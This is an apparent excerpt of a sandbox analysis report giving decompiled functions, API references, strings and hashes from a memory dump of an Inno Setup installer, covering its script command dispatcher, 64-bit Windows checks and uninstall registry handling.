												E004037CC( *((intOrPtr*)(__edx + 0x10)), "POSTBROADCASTMESSAGE");
												if(__eflags != 0) {
													E004037CC( *((intOrPtr*)(__edx + 0x10)), "SENDBROADCASTNOTIFYMESSAGE");
													if(__eflags != 0) {
														E004037CC( *((intOrPtr*)(__edx + 0x10)), "LOADDLL");
														if(__eflags != 0) {
															E004037CC( *((intOrPtr*)(__edx + 0x10)), "CALLDLLPROC");
															if(__eflags != 0) {
																E004037CC( *((intOrPtr*)(__edx + 0x10)), "FREEDLL");
																if(__eflags != 0) {
																	E004037CC( *((intOrPtr*)(__edx + 0x10)), "CREATEMUTEX");
																	if(__eflags != 0) {
																		E004037CC( *((intOrPtr*)(__edx + 0x10)), "OEMTOCHARBUFF");
																		if(__eflags != 0) {
																			E004037CC( *((intOrPtr*)(__edx + 0x10)), "CHARTOOEMBUFF");
																			if(__eflags != 0) {
																				_v5 = 0;
																			} else {
																				E004471F8(_t218,  &_v12, _t371, __edx);
																				_t81 = E004036BC(_v12);
																				CharToOemBuffA(E00403880(_v12), _t83, _t81);
																				E0044754C(_t218, _v12, _t371, _t373);
																			}
																		} else {
																			E004471F8(_t218,  &_v12, _t371, __edx);
																			_t90 = E004036BC(_v12);
																			OemToCharBuffA(E00403880(_v12), _t92, _t90);
																			E0044754C(_t218, _v12, _t371, _t373);
																		}
																	} else {
																		E004471F8(_t218,  &_v16, _t371, __edx);
																		CreateMutexA(0, 0, E00403880(_v16));
																	}
																} else {
																	_t103 = FreeLibrary(E0044719C(_t218, _t219, _t371 - 1, __fp0));
																	asm("sbb ecx, ecx");
																	E004472D0(_t218,  ~( ~_t103), _t371, _t373, __fp0);
																}
															} else {
																E004471F8(_t218,  &_v16, _t371 - 2, __edx);
																_push(E00403880(_v16));
																_t111 = E0044719C(_t218,  &_v16, _t371 - 1, __fp0);
																_push(_t111);
																L00405AA4();
																_t367 = _t111;
																__eflags = _t367;
																if(_t367 == 0) {
																	E004472D0(_t218, 0, _t371, _t373, __fp0);
																} else {
																	E00447478(_t218,  *_t367(E0044719C(_t218,  &_v16, _t371 - 3, __fp0), E0044719C(_t218,  &_v16, _t371 - 4, __fp0)), _t371 - 5, _t373, __fp0);
																	E004472D0(_t218, 1, _t371, _t373, __fp0);
																}
															}
														} else {
															E004471F8(_t218,  &_v16, _t371 - 1, __edx);
															_t368 = E0042E324(_v16, _t218, 0x8000);
															__eflags = _t368;
															if(_t368 == 0) {
																_t127 = GetLastError();
																__eflags = _t371 - 2;
																E00447478(_t218, _t127, _t371 - 2, _t373, __fp0);
															} else {
																E00447478(_t218, 0, _t371 - 2, _t373, __fp0);
															}
															E00447478(_t218, _t368, _t371, _t373, _t377);
														}
													} else {
														_t135 = E0044719C(_t218, _t219, _t371 - 3, __fp0);
														_t137 = E0044719C(_t218, _t219, _t371 - 2, __fp0);
														_t140 = SendNotifyMessageA(0xffff, E0044719C(_t218, _t219, _t371 - 1, __fp0), _t137, _t135);
														asm("sbb ecx, ecx");
														E004472D0(_t218,  ~( ~_t140), _t371, _t373, __fp0);
													}
												} else {
													_t144 = E0044719C(_t218, _t219, _t371 - 3, __fp0);
													_t146 = E0044719C(_t218, _t219, _t371 - 2, __fp0);
													_t149 = PostMessageA(0xffff, E0044719C(_t218, _t219, _t371 - 1, __fp0), _t146, _t144);
													asm("sbb ecx, ecx");
													E004472D0(_t218,  ~( ~_t149), _t371, _t373, __fp0);
												}
											} else {
												_t153 = E0044719C(_t218, _t219, _t371 - 3, __fp0);
												_t155 = E0044719C(_t218, _t219, _t371 - 2, __fp0);
												E00447478(_t218, SendMessageA(0xffff, E0044719C(_t218, _t219, _t371 - 1, __fp0), _t155, _t153), _t371, _t373, __fp0);
											}
										} else {
											E004471F8(_t218,  &_v16, _t371 - 1, __edx);
											E00447478(_t218, RegisterClipboardFormatA(E00403880(_v16)), _t371, _t373, __fp0);
										}
									} else {
										_t169 = E0044719C(_t218, _t219, _t371 - 4, __fp0);
										_t171 = E0044719C(_t218, _t219, _t371 - 3, __fp0);
										_t173 = E0044719C(_t218, _t219, _t371 - 2, __fp0);
										_t176 = SendNotifyMessageA(E0044719C(_t218, _t219, _t371 - 1, __fp0), _t173, _t171, _t169);
										asm("sbb ecx, ecx");
										E004472D0(_t218,  ~( ~_t176), _t371, _t373, __fp0);
									}
								} else {
									_t180 = E0044719C(_t218, _t219, _t371 - 4, __fp0);
									_t182 = E0044719C(_t218, _t219, _t371 - 3, __fp0);
									_t184 = E0044719C(_t218, _t219, _t371 - 2, __fp0);
									_t187 = PostMessageA(E0044719C(_t218, _t219, _t371 - 1, __fp0), _t184, _t182, _t180);
									asm("sbb ecx, ecx");
									E004472D0(_t218,  ~( ~_t187), _t371, _t373, __fp0);
								}
							} else {
								_t191 = E0044719C(_t218, _t219, _t371 - 4, __fp0);
								_t193 = E0044719C(_t218, _t219, _t371 - 3, __fp0);
								_t195 = E0044719C(_t218, _t219, _t371 - 2, __fp0);
								E00447478(_t218, SendMessageA(E0044719C(_t218, _t219, _t371 - 1, __fp0), _t195, _t193, _t191), _t371, _t373, __fp0);
							}
						} else {
							E004471F8(_t218,  &_v16, _t371 - 1, __edx);
							E00447478(_t218, FindWindowA(0, E00403880(_v16)), _t371, _t373, __fp0);
						}
					} else {
						E004471F8(_t218,  &_v16, _t371 - 1, __edx);
						_t212 = FindWindowA(E00403880(_v16), 0); // executed
						E00447478(_t218, _t212, _t371, _t373, __fp0);
					}
				} else {
					Sleep(E0044719C(_t218, _t219, _t371, __fp0));
				}
				_pop(_t275);
				 *[fs:eax] = _t275;
				_push(0x4856c0);
				return E00403568( &_v16, 2);
			}

0x004851c4
0x004851c4
0x004851c5
0x004851c7
0x004851c9
0x004851cb
0x004851cd
0x004851d2
0x004851d7
0x004851d8
0x004851dd
0x004851e0
0x004851e6
0x004851e7
0x004851f3
0x004851f8
0x00485216
0x0048521b
0x00485252
0x00485257
0x0048528e
0x00485293
0x004852e4
0x004852e9
0x00485340
0x00485345
0x0048539c
0x004853a1
0x004853d6
0x004853db
0x00485424
0x00485429
0x00485478
0x0048547d
0x004854cc
0x004854d1
0x0048552e
0x00485533
0x004855b5
0x004855ba
0x004855ea
0x004855ef
0x0048561c
0x00485621
0x0048565f
0x00485664
0x0048569a
0x00485666
0x0048566d
0x00485675
0x00485687
0x00485693
0x00485693
0x00485623
0x0048562a
0x00485632
0x00485644
0x00485650
0x00485650
0x004855f1
0x004855f8
0x0048560a
0x0048560a
0x004855bc
0x004855c7
0x004855d0
0x004855d8
0x004855d8
0x00485535
0x0048553f
0x0048554c
0x00485552
0x00485557
0x00485558
0x0048555d
0x0048555f
0x00485561
0x004855a3
0x00485563
0x00485588
0x00485593
0x00485593
0x00485561
0x004854d3
0x004854db
0x004854ed
0x004854ef
0x004854f1
0x00485503
0x0048550c
0x00485511
0x004854f3
0x004854fc
0x004854fc
0x0048551c
0x0048551c
0x0048547f
0x00485486
0x00485493
0x004854a9
0x004854b2
0x004854ba
0x004854ba
0x0048542b
0x00485432
0x0048543f
0x00485455
0x0048545e
0x00485466
0x00485466
0x004853dd
0x004853e4
0x004853f1
0x00485412
0x00485412
0x004853a3
0x004853ab
0x004853c4
0x004853c4
0x00485347
0x0048534e
0x0048535b
0x00485368
0x00485379
0x00485382
0x0048538a
0x0048538a
0x004852eb
0x004852f2
0x004852ff
0x0048530c
0x0048531d
0x00485326
0x0048532e
0x0048532e
0x00485295
0x0048529c
0x004852a9
0x004852b6
0x004852d2
0x004852d2
0x00485259
0x00485261
0x0048527c
0x0048527c
0x0048521d
0x00485227
0x00485235
0x00485240
0x00485240
0x004851fa
0x00485204
0x00485204
0x004856a0
0x004856a3
0x004856a6
0x004856b8

APIs

Sleep.KERNEL32(00000000,00000000,004856B9,?,?,?,?,00000000,00000000,00000000), ref: 00485204
FindWindowA.USER32 ref: 00485235

Strings

SLEEP, xrefs: 004851EE
SENDNOTIFYMESSAGE, xrefs: 0048533B
CREATEMUTEX, xrefs: 004855E5
FINDWINDOWBYCLASSNAME, xrefs: 00485211
REGISTERWINDOWMESSAGE, xrefs: 00485397
FREEDLL, xrefs: 004855B0
SENDBROADCASTMESSAGE, xrefs: 004853D1
SENDMESSAGE, xrefs: 00485289
CALLDLLPROC, xrefs: 00485529
FINDWINDOWBYWINDOWNAME, xrefs: 0048524D
LOADDLL, xrefs: 004854C7
POSTBROADCASTMESSAGE, xrefs: 0048541F
POSTMESSAGE, xrefs: 004852DF
CHARTOOEMBUFF, xrefs: 0048565A
OEMTOCHARBUFF, xrefs: 00485617
SENDBROADCASTNOTIFYMESSAGE, xrefs: 00485473

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: FindSleepWindow
String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
API String ID: 3078808852-3310373309
Opcode ID: 32fd8cc52f6226ae962693c0dd3a6692aafc5fc9af3f5195145d16e17c8f316e
Instruction ID: 486c8a4f85080d3797c4469fcd6879611c897998de4fe88eb01d54865bdc553e
Opcode Fuzzy Hash: 32fd8cc52f6226ae962693c0dd3a6692aafc5fc9af3f5195145d16e17c8f316e
Instruction Fuzzy Hash: 6AC14FA0B1460157D715BE3E8C4251F56AA9B88704B20C97FB44AEB78BDE3CDC0B835D

Uniqueness

Uniqueness Score: -1.00%

Function 00477E6C Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00477E6C() {
				struct _SYSTEM_INFO _v52;
				struct HINSTANCE__* _t4;
				void* _t7;
				void* _t8;
				void* _t9;
				intOrPtr* _t10;
				void* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				intOrPtr* _t17;
				intOrPtr* _t18;

				 *0x4ae250 = 0;
				_t4 = GetModuleHandleA("kernel32.dll");
				_t15 = _t4;
				_push("GetNativeSystemInfo");
				_push(_t15);
				L00405AA4();
				if(_t4 == 0) {
					GetSystemInfo( &_v52);
				} else {
					_t10 = _t4->i( &_v52); // executed
					_push("IsWow64Process");
					_push(_t15);
					L00405AA4();
					_t17 = _t10;
					if(_t17 != 0) {
						_push(_t18);
						_push(GetCurrentProcess());
						if( *_t17() != 0 &&  *_t18 != 0) {
							_t13 = E00451330();
							if(_t13 != 0) {
								_push("GetSystemWow64DirectoryA");
								_push(_t15);
								L00405AA4();
								if(_t13 != 0) {
									_push("RegDeleteKeyExA");
									_t14 = GetModuleHandleA("advapi32.dll");
									_push(_t14);
									L00405AA4();
									if(_t14 != 0) {
										 *0x4ae250 = 1;
									}
								}
							}
						}
					}
				}
				_t7 = _v52.dwOemId - 1;
				if(_t7 < 0) {
					 *0x48cb10 = 1;
					return _t7;
				}
				_t8 = _t7 - 5;
				if(_t8 == 0) {
					 *0x48cb10 = 3;
					return _t8;
				}
				_t9 = _t8 - 3;
				if(_t9 != 0) {
					 *0x48cb10 = 0;
					return _t9;
				}
				 *0x48cb10 = 2;
				return _t9;
			}

0x00477e71
0x00477e7d
0x00477e82
0x00477e84
0x00477e89
0x00477e8a
0x00477e91
0x00477efd
0x00477e93
0x00477e98
0x00477e9a
0x00477e9f
0x00477ea0
0x00477ea5
0x00477ea9
0x00477eab
0x00477eb1
0x00477eb6
0x00477ebe
0x00477ec5
0x00477ec7
0x00477ecc
0x00477ecd
0x00477ed4
0x00477ed6
0x00477ee0
0x00477ee5
0x00477ee6
0x00477eed
0x00477eef
0x00477eef
0x00477eed
0x00477ed4
0x00477ec5
0x00477eb6
0x00477ea9
0x00477f07
0x00477f0b
0x00477f1b
0x00000000
0x00477f1b
0x00477f0d
0x00477f11
0x00477f24
0x00000000
0x00477f24
0x00477f13
0x00477f17
0x00477f36
0x00000000
0x00477f36
0x00477f2d
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00477E7D
6D2B5550.KERNEL32(00000000,GetNativeSystemInfo,kernel32.dll), ref: 00477E8A
GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00477E98
6D2B5550.KERNEL32(00000000,IsWow64Process), ref: 00477EA0
GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00477EAC
6D2B5550.KERNEL32(00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00477ECD
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00477EE0
6D2B5550.KERNEL32(00000000,advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00477EE6
GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00477EFD

Strings

GetNativeSystemInfo, xrefs: 00477E84
kernel32.dll, xrefs: 00477E78
IsWow64Process, xrefs: 00477E9A
RegDeleteKeyExA, xrefs: 00477ED6
GetSystemWow64DirectoryA, xrefs: 00477EC7
advapi32.dll, xrefs: 00477EDB

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550$HandleInfoModuleSystem$CurrentNativeProcess
String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
API String ID: 1514743680-2623177817
Opcode ID: 7aa52418ded5cd30a099044d76a3c5e39a283bb6d088d1fd91fabeea99984bbb
Instruction ID: 1bca21d482c9e2aba29b18e94f8a98aa66fbe804b7db4c3ff165f16ab90c5700
Opcode Fuzzy Hash: 7aa52418ded5cd30a099044d76a3c5e39a283bb6d088d1fd91fabeea99984bbb
Instruction Fuzzy Hash: 5611005020C74154DA0273756F86BEB16889B00308FD88E6BF85CA53C3D7BC8841CABE

Uniqueness

Uniqueness Score: -1.00%

Function 00462898 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00462898(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char* _v40;
				intOrPtr _t62;
				void* _t76;
				intOrPtr _t77;
				void* _t78;
				void* _t90;
				void* _t92;
				void* _t100;
				void* _t102;
				intOrPtr* _t114;
				intOrPtr _t134;
				intOrPtr _t139;
				void* _t156;
				void* _t158;
				void* _t160;
				void* _t161;
				intOrPtr _t162;

				_t160 = _t161;
				_t162 = _t161 + 0xffffffdc;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_t158 = __eax;
				_push(_t160);
				_push(0x462acd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t162;
				_t62 =  *0x4ae06c; // 0x21e4a18
				E004717F8(_t62, __ecx,  &_v16);
				if(_v16 == 0) {
					L22:
					__eflags = 0;
					_pop(_t134);
					 *[fs:eax] = _t134;
					_push(E00462AD4);
					return E00403568( &_v24, 4);
				} else {
					E0046EBF4(_v16, __ecx,  &_v20);
					_t156 = 2;
					_t114 = 0x48ca88;
					while(1) {
						_v40 = "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
						_v36 = 0xb;
						_v32 = _v20;
						_v28 = 0xb;
						E00407B08("%s\\%s_is1", 1,  &_v40,  &_v24);
						_t76 = E00403880(_v24);
						_t77 =  *0x48cb0c; // 0x1, executed
						_t78 = E0042DD88(_t77, _t76,  *_t114,  &_v8, 1, 0); // executed
						if(_t78 == 0) {
							_push(_t160);
							_push(0x462aa1);
							_push( *[fs:eax]);
							 *[fs:eax] = _t162;
							if(( *0x4ae17e & 0x00000004) != 0) {
								E0042DCB8();
							}
							break;
						}
						_t114 = _t114 + 4;
						_t156 = _t156 - 1;
						__eflags = _t156;
						if(_t156 != 0) {
							continue;
						} else {
							goto L22;
						}
						goto L23;
					}
					if(( *0x4ae17e & 0x00000010) != 0) {
						E0042DCB8();
						if(E0042DCD0(_v8, "Inno Setup: No Icons") != 0) {
							 *((char*)(_t158 + 0x318)) = 1;
						}
					}
					if(( *0x4ae17e & 0x00000040) != 0) {
						E0042DCB8();
						_t100 = E0042DCB8();
						_t169 = _t100;
						if(_t100 != 0) {
							E0040C654( *((intOrPtr*)(_t158 + 0x31c)), _t114, _v12, _t156, _t158, _t169);
						}
						_t102 = E0042DCB8();
						_t170 = _t102;
						if(_t102 != 0) {
							E0040C654( *((intOrPtr*)(_t158 + 0x320)), _t114, _v12, _t156, _t158, _t170);
						}
					}
					if(( *0x4ae17f & 0x00000008) != 0) {
						_t90 = E0042DCB8();
						_t172 = _t90;
						if(_t90 != 0) {
							E0040C654( *((intOrPtr*)(_t158 + 0x324)), _t114, _v12, _t156, _t158, _t172);
						}
						_t92 = E0042DCB8();
						_t173 = _t92;
						if(_t92 != 0) {
							E0040C654( *((intOrPtr*)(_t158 + 0x328)), _t114, _v12, _t156, _t158, _t173);
						}
					}
					if(( *0x4ae180 & 0x00000002) != 0) {
						E0042DCB8();
						E0042DCB8();
						E0042DCB8();
					}
					_pop(_t139);
					 *[fs:eax] = _t139;
					_push(E00462AB2);
					return RegCloseKey(_v8);
				}
				L23:
			}

0x00462899
0x0046289b
0x004628a3
0x004628a6
0x004628a9
0x004628ac
0x004628af
0x004628b3
0x004628b4
0x004628b9
0x004628bc
0x004628c2
0x004628c7
0x004628d0
0x00462ab2
0x00462ab2
0x00462ab4
0x00462ab7
0x00462aba
0x00462acc
0x004628d6
0x004628dc
0x004628e1
0x004628e6
0x004628eb
0x004628fc
0x004628ff
0x00462906
0x00462909
0x0046291a
0x00462922
0x0046292b
0x00462930
0x00462937
0x0046293f
0x00462940
0x00462945
0x00462948
0x00462952
0x00462962
0x00462962
0x00000000
0x00462952
0x00462aa8
0x00462aab
0x00462aab
0x00462aac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00462aac
0x0046296e
0x0046297e
0x00462992
0x00462994
0x00462994
0x00462992
0x004629a2
0x004629b2
0x004629c2
0x004629c7
0x004629c9
0x004629d4
0x004629d4
0x004629e4
0x004629e9
0x004629eb
0x004629f6
0x004629f6
0x004629eb
0x00462a02
0x00462a0f
0x00462a14
0x00462a16
0x00462a21
0x00462a21
0x00462a31
0x00462a36
0x00462a38
0x00462a43
0x00462a43
0x00462a38
0x00462a4f
0x00462a5f
0x00462a72
0x00462a85
0x00462a85
0x00462a8c
0x00462a8f
0x00462a92
0x00462aa0
0x00462aa0
0x00000000

APIs

Part of subcall function 0042DD88: 6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

RegCloseKey.ADVAPI32(?,00462AB2,?,?,00000001,00000000,00000000,00462ACD,?,00000000,00000000,?), ref: 00462A9B

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004628F7
Inno Setup: User Info: Organization, xrefs: 00462A6A
Inno Setup: User Info: Serial, xrefs: 00462A7D
Inno Setup: App Path, xrefs: 0046295A
Inno Setup: Setup Type, xrefs: 004629AA
Inno Setup: Deselected Components, xrefs: 004629DC
Inno Setup: User Info: Name, xrefs: 00462A57
Inno Setup: No Icons, xrefs: 00462983
Inno Setup: Deselected Tasks, xrefs: 00462A29
Inno Setup: Icon Group, xrefs: 00462976
Inno Setup: Selected Tasks, xrefs: 00462A07
Inno Setup: Selected Components, xrefs: 004629BA
%s\%s_is1, xrefs: 00462915

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6790Close
String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2256921126-1093091907
Opcode ID: 7ee68dfff7b4aedbc0e354cfb89b4a29693810ebc588fddb783fb8f9d2310aa6
Instruction ID: cadfe6d216f2647ea2a0a6e45bcc6e3d3627fcf5818918a718398d3bfdcc0778
Opcode Fuzzy Hash: 7ee68dfff7b4aedbc0e354cfb89b4a29693810ebc588fddb783fb8f9d2310aa6
Instruction Fuzzy Hash: 7351BA30A00A04AFCB15EFA6DA51BDEB7F4EF45304F50846AE84067391E7B8AF05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0046B194 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 554
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0046B194(signed int __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				int _v28;
				char _v32;
				char* _v36;
				char _v37;
				int* _v44;
				char _v45;
				char _v52;
				intOrPtr* _v56;
				intOrPtr _v60;
				char* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char* _v80;
				char _v84;
				char _v88;
				intOrPtr _t278;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t300;
				char _t313;
				intOrPtr _t324;
				intOrPtr _t325;
				intOrPtr _t368;
				intOrPtr _t369;
				intOrPtr _t373;
				intOrPtr _t375;
				signed int _t378;
				signed int _t396;
				void* _t402;
				signed int _t408;
				signed int _t411;
				intOrPtr _t414;
				signed int _t425;
				signed int _t429;
				signed int _t438;
				signed int _t451;
				intOrPtr _t452;
				signed int _t459;
				signed int _t479;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				intOrPtr _t537;
				intOrPtr _t540;
				intOrPtr _t546;
				intOrPtr _t552;
				signed int _t555;
				signed int _t557;
				signed int _t561;
				signed int _t570;
				void* _t584;
				void* _t585;
				intOrPtr _t586;
				void* _t609;

				_t582 = __esi;
				_t581 = __edi;
				_t511 = __ebx;
				_t584 = _t585;
				_t586 = _t585 + 0xffffffac;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v84 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v36 = 0;
				_push(_t584);
				_push(0x46b865);
				_push( *[fs:eax]);
				 *[fs:eax] = _t586;
				_t278 =  *0x4ae1f0; // 0x21d2b28
				_t280 =  *((intOrPtr*)(_t278 + 8)) - 1;
				if(_t280 < 0) {
					L85:
					E00466CCC(0x3e8, _t607);
					_pop(_t537);
					 *[fs:eax] = _t537;
					_push(0x46b86c);
					E00403548( &_v84);
					E00403548( &_v36);
					return E00403568( &_v24, 3);
				} else {
					_v52 = _t280 + 1;
					_v44 = 0;
					do {
						_t291 =  *0x4ae1f0; // 0x21d2b28
						_v56 = E0040B654(_t291, _v44);
						_t518 =  *((intOrPtr*)(_v56 + 0xc));
						_t540 =  *0x4ae240; // 0x21d2a20
						_t300 =  *0x4ae23c; // 0x21d29f4
						if(E0046F264(_t300,  *((intOrPtr*)(_v56 + 0xc)), _t540,  *((intOrPtr*)(_v56 + 0x18)),  *((intOrPtr*)(_v56 + 0x14)),  *((intOrPtr*)(_v56 + 0x10))) != 0) {
							E00472E40(0xb, _t518, _v44);
							E0046EEF8();
							E004717F8( *_v56, _t518,  &_v36);
							E004717F8( *((intOrPtr*)(_v56 + 4)), _t518,  &_v16);
							_t313 =  *0x48cb0c; // 0x1
							_v37 = _t313;
							if(( *(_v56 + 0x40) & 0x00000004) != 0) {
								_v37 = 1;
							}
							if(( *(_v56 + 0x40) & 0x00000008) != 0) {
								_t592 =  *0x4ae250;
								if( *0x4ae250 == 0) {
									E00451AFC("Cannot access 64-bit registry keys on this version of Windows", _t511, _t581, _t582, _t592);
								}
								_v37 = 2;
							}
							do {
								_v45 = 0;
								_push(_t584);
								_push(0x46b70b);
								_push( *[fs:edx]);
								 *[fs:edx] = _t586;
								if(( *(_v56 + 0x3f) & 0x00000040) != 0 && E0046B04C(_v36) != 0) {
									E0042DE2C(_v37, _t511, E00403880(_v36),  *((intOrPtr*)(_v56 + 0x38)), _t581, _t582);
								}
								if(( *(_v56 + 0x3f) & 0x00000040) == 0 ||  *((char*)(_v56 + 0x3e)) != 0) {
									if(( *(_v56 + 0x3f) & 0x00000080) == 0 ||  *((char*)(_v56 + 0x3e)) != 0) {
										_t519 = _v36;
										E0046B070(_v37, _t511, _v36,  *((intOrPtr*)(_v56 + 0x38)), _t581, _t582,  *((short*)(_v56 + 0x3c)));
										_t324 = _v56;
										__eflags =  *(_t324 + 0x40) & 0x00000002;
										if(( *(_t324 + 0x40) & 0x00000002) != 0) {
											_t325 = _v56;
											__eflags =  *((char*)(_t325 + 0x3e));
											if( *((char*)(_t325 + 0x3e)) == 0) {
												_t511 = 2;
											} else {
												_t519 = E00403880(_v36);
												_t511 = E0042DD88(_v37, _t465,  *((intOrPtr*)(_v56 + 0x38)),  &_v8, 3, 0);
												__eflags = _t511;
												if(_t511 != 0) {
													__eflags = _t511 - 2;
													if(_t511 != 2) {
														__eflags =  *(_v56 + 0x40) & 0x00000001;
														if(__eflags == 0) {
															_t519 = _v36;
															E0046755C(2, _t511, _v36,  *((intOrPtr*)(_v56 + 0x38)), _t581, _t582, __eflags, _t511);
														}
													}
												}
											}
										} else {
											_t519 = E00403880(_v36);
											_t479 = E0042DD50(_v37, _t476,  *((intOrPtr*)(_v56 + 0x38)),  &_v12,  &_v8, 0, 3, 0, 0, 0); // executed
											_t511 = _t479;
											__eflags = _t511;
											if(_t511 != 0) {
												__eflags =  *(_v56 + 0x40) & 0x00000001;
												if(__eflags == 0) {
													_t519 = _v36;
													E0046755C(1, _t511, _v36,  *((intOrPtr*)(_v56 + 0x38)), _t581, _t582, __eflags, _t511);
												}
											} else {
												__eflags = _v12 - 1;
												if(_v12 == 1) {
													_t519 = _v36;
													E0046B070(_v37, _t511, _v36,  *((intOrPtr*)(_v56 + 0x38)), _t581, _t582,  *((short*)(_v56 + 0x3c)));
												}
											}
										}
										__eflags = _t511;
										if(__eflags != 0) {
											goto L71;
										} else {
											_push(_t584);
											_push(0x46b6fa);
											_push( *[fs:edx]);
											 *[fs:edx] = _t586;
											_t368 = _v56;
											__eflags =  *(_t368 + 0x3f) & 0x00000080;
											if(( *(_t368 + 0x3f) & 0x00000080) != 0) {
												_push(E00403880(_v16));
												_push(_v8);
												L004058FC();
											}
											_t369 = _v56;
											__eflags =  *((char*)(_t369 + 0x3e));
											if( *((char*)(_t369 + 0x3e)) != 0) {
												_t373 = _v56;
												__eflags =  *(_t373 + 0x3f) & 0x00000001;
												if(( *(_t373 + 0x3f) & 0x00000001) == 0) {
													L36:
													_t375 =  *((intOrPtr*)(_v56 + 0x3e));
													_t555 = _t375 - 0xffffffffffffffff;
													__eflags = _t555;
													if(__eflags < 0) {
														L40:
														_t512 = 1;
														_t557 = _t375 - 2;
														__eflags = _t557;
														if(_t557 == 0) {
															_t512 = 2;
														} else {
															__eflags = _t557 == 3;
															if(_t557 == 3) {
																_t512 = 7;
															}
														}
														__eflags = _t375 - 5;
														if(_t375 == 5) {
															_t378 = E004039A4("{olddata}",  *((intOrPtr*)(_v56 + 8)));
															__eflags = _t378;
															if(_t378 == 0) {
																L57:
																E00403548( &_v24);
															} else {
																E00403880(_v16);
																_t408 = E0042DCC4();
																__eflags = _t408;
																if(_t408 == 0) {
																	goto L57;
																}
															}
															_v80 = "olddata";
															_v76 = _v24;
															_v72 = 0x46b8e8;
															_v68 = 0x46b8f8;
															E00471818( *((intOrPtr*)(_v56 + 8)), _t512, 3,  &_v80, _t581, _t582, _t609,  &_v20);
															__eflags = _v20;
															if(_v20 != 0) {
